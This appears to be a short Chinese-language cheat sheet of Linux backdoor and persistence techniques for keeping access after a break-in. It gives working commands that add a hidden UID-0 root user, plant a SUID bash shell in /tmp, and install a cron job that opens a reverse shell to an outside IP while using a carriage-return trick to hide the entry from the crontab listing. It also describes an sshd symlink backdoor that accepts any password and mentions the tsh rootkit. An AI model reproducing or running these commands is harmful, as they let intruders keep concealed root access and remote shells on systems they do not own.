一。添加root权限用户
一句话非交互式添加root权限用户
useradd -o -u 0 -g 0 test &&usermod -p xxx
xxx的值为python -c "import crypt;crypt.crypt('123456','ab')"
二。放置suid shell
配合普通用户权限使用
cp /bin/bash /tmp/fuck
chmod u+s /tmp/fuck
三。crontab
类似windows schtasks
(crontab -l;printf "* * * * * exec 9<> /dev/tcp/192.168.21.1/8080;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
四。rookit
常用tsh,详情可见http://www.freebuf.com/sectool/138350.html
tsh 运行后有时候会自动隐藏进程,删除源文件一直内存中运行就行
五。ssh后门
openssh 麻烦,限制多,不推荐
软连接后门用户名root,密码随意,但是很容易被发现:
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
六。启动项
/etc/rc.local
七。webshell
网友评论